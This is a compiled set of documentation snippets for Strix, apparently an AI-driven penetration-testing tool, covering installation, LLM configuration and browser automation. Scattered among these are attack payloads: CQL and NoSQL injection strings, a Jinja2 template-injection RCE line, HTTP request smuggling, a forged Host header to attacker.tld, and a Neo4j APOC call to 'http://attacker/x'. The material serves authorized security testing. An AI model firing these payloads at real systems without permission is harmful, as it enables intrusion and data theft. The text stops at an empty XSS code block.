### Agent Browser Quickstart: Screenshot and Search

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md

A quickstart guide demonstrating how to take a screenshot of a page, then perform a search, click a result, and capture it. The browser remains active across commands, so one session spans the whole sequence.

```bash
# Take a screenshot of a page
agent-browser open https://example.com
agent-browser screenshot
agent-browser close

# Search, click a result, and capture it
agent-browser open https://duckduckgo.com
agent-browser snapshot -i                  # find the search box ref
agent-browser fill @e1 "agent-browser cli"
agent-browser press Enter
agent-browser wait --load networkidle
agent-browser snapshot -i                  # refs now reflect results
agent-browser click @e5                    # click a result
agent-browser screenshot
```

--------------------------------

### Example Azure OpenAI Configuration

Source: https://github.com/usestrix/strix/blob/main/docs/llm-providers/azure.mdx

A concrete example of the environment variables needed for a specific Azure OpenAI deployment.

```bash
export STRIX_LLM="azure/gpt-5.4-deployment"
export AZURE_API_KEY="abc123..."
export AZURE_API_BASE="https://mycompany.openai.azure.com"
export AZURE_API_VERSION="2025-11-01-preview"
```

--------------------------------

### Example Environment Variable Setup

Source: https://github.com/usestrix/strix/blob/main/docs/advanced/configuration.mdx

Set required and optional environment variables to configure Strix, including the LLM, web search, and timeouts.

```bash
# Required
export STRIX_LLM="openai/gpt-5.4"
export LLM_API_KEY="sk-..."

# Optional: Enable web search
export PERPLEXITY_API_KEY="pplx-..."

# Optional: Custom timeouts
export LLM_TIMEOUT="600"
export STRIX_SANDBOX_EXECUTION_TIMEOUT="300"
```

--------------------------------

### Install and Run Local Preview

Source: https://github.com/usestrix/strix/blob/main/docs/README.md

Install Mintlify globally, then run the local development server from the docs directory.

```bash
npm i -g mintlify
cd docs && mintlify dev
```

--------------------------------

### Basic Scan Example

Source: https://github.com/usestrix/strix/blob/main/docs/usage/cli.mdx

Initiates a scan on a given URL. This is the simplest way to start testing a target.

```bash
strix --target https://example.com
```

--------------------------------

### Install Development Dependencies

Source: https://github.com/usestrix/strix/blob/main/docs/contributing.mdx

Install all necessary development dependencies using the provided Makefile, or manually with uv.

```bash
make setup-dev
```

```bash
uv sync
uv run pre-commit install
```

--------------------------------

### Gospider Example

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/katana.md

An example of using gospider as an alternate crawler to find endpoints missed by Katana, with a specified start URL, depth, concurrency, and thread count.

```bash
gospider -s https://target.tld -d 3 -c 10 -t 20
```

--------------------------------

### Install Strix with Vertex AI Extra

Source: https://github.com/usestrix/strix/blob/main/docs/llm-providers/vertex.mdx

Install the Strix agent with the necessary Vertex AI dependencies using pipx.

```bash
pipx install "strix-agent[vertex]"
```

--------------------------------

### Install Strix using curl

Source: https://github.com/usestrix/strix/blob/main/docs/quickstart.mdx

Use this command to install Strix directly from the official source.

```bash
curl -sSL https://strix.ai/install | bash
```

--------------------------------

### Install, Configure, and Run Strix Scan

Source: https://github.com/usestrix/strix/blob/main/docs/index.mdx

This snippet shows how to install Strix using curl, configure the environment variables the LLM needs, and initiate a scan against a local application directory.

```bash
# Install
curl -sSL https://strix.ai/install | bash

# Configure
export STRIX_LLM="openai/gpt-5.4"
export LLM_API_KEY="your-api-key"

# Scan
strix --target ./your-app
```

--------------------------------

### Install Strix and Run First Scan

Source: https://github.com/usestrix/strix/blob/main/README.md

Installs Strix using the curl script, configures an AI provider with environment variables, and initiates a security assessment on a local directory.

```bash
curl -sSL https://strix.ai/install | bash
export STRIX_LLM="openai/gpt-5.4"
export LLM_API_KEY="your-api-key"
strix --target ./app-directory
```

--------------------------------

### Install Strix using pipx

Source: https://github.com/usestrix/strix/blob/main/docs/quickstart.mdx

Install the Strix agent using the pipx package manager.

```bash
pipx install strix-agent
```

--------------------------------

### GraphQL Transport Switching Examples

Source: https://github.com/usestrix/strix/blob/main/strix/skills/protocols/graphql.md

Demonstrates the Content-Type headers used to switch transport mechanisms for GraphQL requests: JSON, raw GraphQL, multipart form data, and GET requests with query parameters.

```text
Content-Type: application/json
Content-Type: application/graphql
Content-Type: multipart/form-data
GET with query params
```

--------------------------------

### Agent Browser Snapshot Output Example

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md

An example of the structured output format produced by the `agent-browser snapshot` command, showing elements with references, types, and text content.

```text
Page: Example - Log in
URL: https://example.com/login

@e1 [heading] "Log in"
@e2 [form]
@e3 [input type="email"] placeholder="Email"
@e4 [input type="password"] placeholder="Password"
@e5 [button type="submit"] "Continue"
@e6 [link] "Forgot password?"
```

--------------------------------

### Scope Configuration Example

Source: https://github.com/usestrix/strix/blob/main/docs/tools/proxy.mdx

Example configuration for defining allowlist and denylist rules to filter proxy traffic. These rules focus the proxy on specific domains and exclude static file types.

```plaintext
Allowlist: ["api.example.com", "*.example.com"]
Denylist: ["*.gif", "*.jpg", "*.png", "*.css", "*.js"]
```

--------------------------------

### Example Instruction File Content

Source: https://github.com/usestrix/strix/blob/main/docs/usage/instructions.mdx

This markdown file demonstrates how to structure detailed penetration test instructions, including credentials, focus areas, and out-of-scope items.

```markdown
# Penetration Test Instructions

## Credentials
- Admin: admin@example.com / AdminPass123
- User: user@example.com / UserPass123

## Focus Areas
1. IDOR in user profile endpoints
2. Privilege escalation between roles
3. JWT token manipulation

## Out of Scope
- /health endpoints
- Third-party integrations
```

--------------------------------

### Skill File Structure Example

Source: https://github.com/usestrix/strix/blob/main/docs/advanced/skills.mdx

This is the standard template for a skill file: YAML frontmatter for metadata, followed by Markdown sections for the detailed content.

```markdown
---
name: skill_name
description: Brief description of the skill's coverage
---

# Skill Title

Key insight about this vulnerability or technique.

## Attack Surface
What this skill covers and where to look.

## Methodology
Step-by-step testing approach.

## Techniques
How to discover and exploit the vulnerability.

## Bypass Methods
How to bypass common protections.

## Validation
How to confirm findings and avoid false positives.
```

--------------------------------

### Jenkins Pipeline Configuration

Source: https://github.com/usestrix/strix/blob/main/docs/integrations/ci-cd.mdx

Set up a Jenkins pipeline to install and run Strix. Use Jenkins credentials for STRIX_LLM and LLM_API_KEY.

```groovy
pipeline {
    agent any
    environment {
        STRIX_LLM = credentials('strix-llm')
        LLM_API_KEY = credentials('llm-api-key')
    }
    stages {
        stage('Security Scan') {
            steps {
                sh 'curl -sSL https://strix.ai/install | bash'
                sh 'strix -n -t ./ --scan-mode quick'
            }
        }
    }
}
```

--------------------------------

### Example Model Formats

Source: https://github.com/usestrix/strix/blob/main/docs/llm-providers/overview.mdx

Illustrates the LiteLLM model naming convention, `provider/model-name`, for various LLM services.

```text
openai/gpt-5.4
anthropic/claude-sonnet-4-6
vertex_ai/gemini-3-pro-preview
bedrock/anthropic.claude-4-5-sonnet-20251022-v1:0
ollama/llama4
```

--------------------------------

### Cassandra CQL Injection Examples

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md

Examples of injecting conditions into Cassandra CQL queries when input is concatenated into the query instead of bound as a parameter.

```text
username: ' OR '1'='1' ALLOW FILTERING --
```

```text
username: 'x' OR token(username) > token('a') ALLOW FILTERING --
```

--------------------------------

### JS-Snooper Script Example

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/katana.md

Demonstrates the usage of the JS-Snooper script for internal JavaScript file discovery on a given domain.

```bash
~/tools/JS-Snooper/js_snooper.sh
```

--------------------------------

### Jsniper Script Example

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/katana.md

Shows how to use the jsniper.sh script to sweep a domain for JavaScript files, endpoints, keys, and secrets.

```bash
~/tools/jsniper.sh/jsniper.sh
```

--------------------------------

### Record Browser Workflow Video

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md

Record a video of browser interactions. Start recording with `record start `, perform actions, and stop with `record stop`. Refer to the documentation for codec options and GIF export.

```bash
agent-browser record start demo.webm
```

```bash
agent-browser open https://example.com
```

```bash
agent-browser snapshot -i
```

```bash
agent-browser click @e3
```

```bash
agent-browser record stop
```

--------------------------------

### Fetch and Analyze POST Requests

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/python.md

An example demonstrating how to fetch POST requests under a specific API path using `list_requests` and then inspect their raw bodies for specific content. Requires `asyncio` to run.

```python
import asyncio

from caido_api import list_requests, view_request


async def main():
    # HTTPQL filter: POST requests whose path contains "/api/"
    posts = await list_requests(
        httpql_filter='req.method.eq:"POST" AND req.path.cont:"/api/"',
        first=50,
    )
    candidates = []
    for edge in posts.edges:
        request_id = edge.node.request.id
        # Fetch the raw request (not the response) for this ID
        body = await view_request(request_id, part="request")
        raw = body.request.raw.decode("utf-8", errors="replace")
        # Keep requests whose body carries an id= or user= parameter
        if "id=" in raw or "user=" in raw:
            candidates.append(request_id)
    print(f"{len(candidates)} candidates")
    print(candidates[:10])


asyncio.run(main())
```

--------------------------------

### Jinja Template Probes

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/ssti.md

Examples of probing for objects that are available within a Jinja templating environment.

```jinja
{{self}}
{{config}}
{{request}}
{{cycler}}
```

--------------------------------

### Content-Type Switching Example

Source: https://github.com/usestrix/strix/blob/main/strix/skills/frameworks/fastapi.md

Demonstrates how different content types can lead to different validation logic or code paths within an application. Switching between JSON, form data, and multipart data exercises each path.

```text
application/json ↔ application/x-www-form-urlencoded ↔ multipart/form-data
```

--------------------------------

### NoSQL Injection Example: Bracket Notation Input

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md

Illustrates sending NoSQL operators using bracket notation in form fields or URL parameters. This bypasses middleware that only parses JSON bodies.

```url
field[$ne]=null
```

--------------------------------

### Template Injection Examples

Source: https://github.com/usestrix/strix/blob/main/strix/skills/frameworks/fastapi.md

Demonstrates basic arithmetic confirmation and Remote Code Execution (RCE) via Jinja2 template injection in FastAPI. Check autoescape settings and custom filters/globals.

```jinja
{{7*7}}  # Arithmetic confirmation
{{cycler.__init__.__globals__['os'].popen('id').read()}}  # RCE
```

--------------------------------

### GraphQL Input Type Confusion Examples

Source: https://github.com/usestrix/strix/blob/main/strix/skills/protocols/graphql.md

Demonstrates type confusion scenarios that supply unexpected data types for input fields, such as numbers instead of strings or arrays instead of null.

```text
{id: 123}    vs  {id: "123"}
{id: [123]}  vs  {id: null}
{id: 0}      vs  {id: -1}
```

--------------------------------

### Fetch Build Manifests and Chunks

Source: https://github.com/usestrix/strix/blob/main/strix/skills/frameworks/nextjs.md

Demonstrates common GET requests that retrieve Next.js build artifacts such as build manifests and JavaScript chunks, which can reveal the route structure.

```http
GET /_next/static//_buildManifest.js
GET /_next/static//_ssgManifest.js
GET /_next/static/chunks/pages/
GET /_next/static/chunks/app/
```

--------------------------------

### H2.CL Example: HTTP/2 Front-end Downgrades to HTTP/1.1, Injects Content-Length

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/http_request_smuggling.md

Shows how an HTTP/2 front-end that downgrades to HTTP/1.1 can be exploited by injecting a conflicting `content-length` header, leading to request smuggling.

```http
:method POST
:path /
:authority target.com
content-type application/x-www-form-urlencoded
content-length: 0

SMUGGLED_PREFIX
```

--------------------------------

### Get Core Agent Browser Skills with Full Details

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md

Use this command to retrieve all available skills for agent-browser with full details, including commands, flags, and environment variables.

```bash
agent-browser skills get core --full
```

--------------------------------

### Host Header Confusion Example

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/header_injection.md

Demonstrates a POST request with a forged Host header to exploit host header confusion. This can lead to password reset links or OAuth redirect URIs pointing to attacker-controlled infrastructure.

```http
POST /password-reset HTTP/1.1
Host: attacker.tld
```

--------------------------------

### Provide Instructions via File

Source: https://github.com/usestrix/strix/blob/main/README.md

Use a file to provide detailed instructions, scope, and exclusions for the security scan.

```bash
strix --target api.your-app.com --instruction-file ./instruction.md
```

--------------------------------

### GraphQL Endpoint Discovery

Source: https://github.com/usestrix/strix/blob/main/strix/skills/protocols/graphql.md

Common POST and GET requests for discovering GraphQL endpoints. Each sends a minimal `__typename` query so that a live endpoint identifies itself by answering.

```text
POST /graphql        {"query":"{__typename}"}
POST /api/graphql    {"query":"{__typename}"}
POST /v1/graphql     {"query":"{__typename}"}
POST /gql            {"query":"{__typename}"}
GET  /graphql?query={__typename}
```

--------------------------------

### Agent Creation with Specialized Skills

Source: https://github.com/usestrix/strix/blob/main/strix/skills/README.md

Demonstrates how to create an agent and load the skills relevant to its task. Skills are provided as a comma-separated string.

```python
create_agent(
    task="Test authentication mechanisms in API",
    name="Auth Specialist",
    skills="authentication_jwt,business_logic",
)
```

--------------------------------

### Run Strix with File-Based Instructions

Source: https://github.com/usestrix/strix/blob/main/docs/usage/instructions.mdx

For more complex instructions, use the `--instruction-file` flag to specify the path to a markdown file containing detailed guidance.

```bash
strix --target https://app.com --instruction-file ./pentest-instructions.md
```

--------------------------------

### Elasticsearch Query String Injection Examples

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md

Examples of injecting Lucene syntax into Elasticsearch `query_string` and `simple_query_string` queries for various probes.

```text
q=normal+search → normal results
```

```text
q=*
```

```text
q=role:admin → filter by field
```

```text
q=_exists_:password_hash → existence probe
```

--------------------------------

### Configure Strix with LM Studio / OpenAI Compatible

Source: https://github.com/usestrix/strix/blob/main/docs/llm-providers/local.mdx

Set environment variables to connect Strix to a local LLM server that speaks the OpenAI API format. Adjust the port if your server listens on a different one.

```bash
export STRIX_LLM="openai/local-model"
export LLM_API_BASE="http://localhost:1234/v1"
```

--------------------------------

### GraphQL Variable Injection Example

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md

Example of injecting a filter condition into a GraphQL query when variables are passed directly to a NoSQL filter.

```graphql
query Login($input: UserFilter!) {
  user(filter: $input) {
    id
    role
  }
}
```

```json
{"input": {"username": "admin", "password": {"$ne": ""}}}
```

--------------------------------

### Neo4j APOC Procedure Abuse Examples

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md

Examples of abusing APOC procedures for SSRF, external data fetching, and dynamic query execution when they are left unrestricted.

```text
CALL apoc.load.json('http://attacker/x')
```

```text
CALL apoc.cypher.run("", {})
```

```text
CALL dbms.security.listUsers()
```

--------------------------------

### Agent Browser Core Loop

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md

Illustrates the fundamental workflow: open a URL, take a snapshot to identify interactive elements, act on those elements using their references, and re-snapshot after any change.

```bash
agent-browser open           # 1. Open a page
agent-browser snapshot -i    # 2. See what's on it (interactive elements only)
agent-browser click @e3      # 3. Act on refs from the snapshot
agent-browser snapshot -i    # 4. Re-snapshot after any page change
```

--------------------------------

### Install Python Packages with uv

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/python.md

Use the `uv` package manager to install additional Python dependencies for an exploit script within the sandbox environment. Specify the Python interpreter path.

```bash
uv pip install --python /app/.venv/bin/python
```

--------------------------------

### Agent Browser Snapshot Options

Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md

Demonstrates the options of the `snapshot` command for customizing its output: full tree, interactive elements only, link URLs, compact output, depth capping, scoping by CSS selector, and JSON output.

```bash
agent-browser snapshot             # full tree (verbose)
agent-browser snapshot -i          # interactive elements only (preferred)
agent-browser snapshot -i -u       # include href urls on links
agent-browser snapshot -i -c       # compact (no empty structural nodes)
agent-browser snapshot -i -d 3     # cap depth at 3 levels
agent-browser snapshot -s "#main"  # scope to a CSS selector
agent-browser snapshot -i --json   # machine-readable output
```

--------------------------------

### Mutation XSS Examples

Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/xss.md

Illustrates Mutation XSS using malformed HTML tags and attributes that the browser's parser repairs into executable markup. These examples leverage noscript tags and form attributes.

```html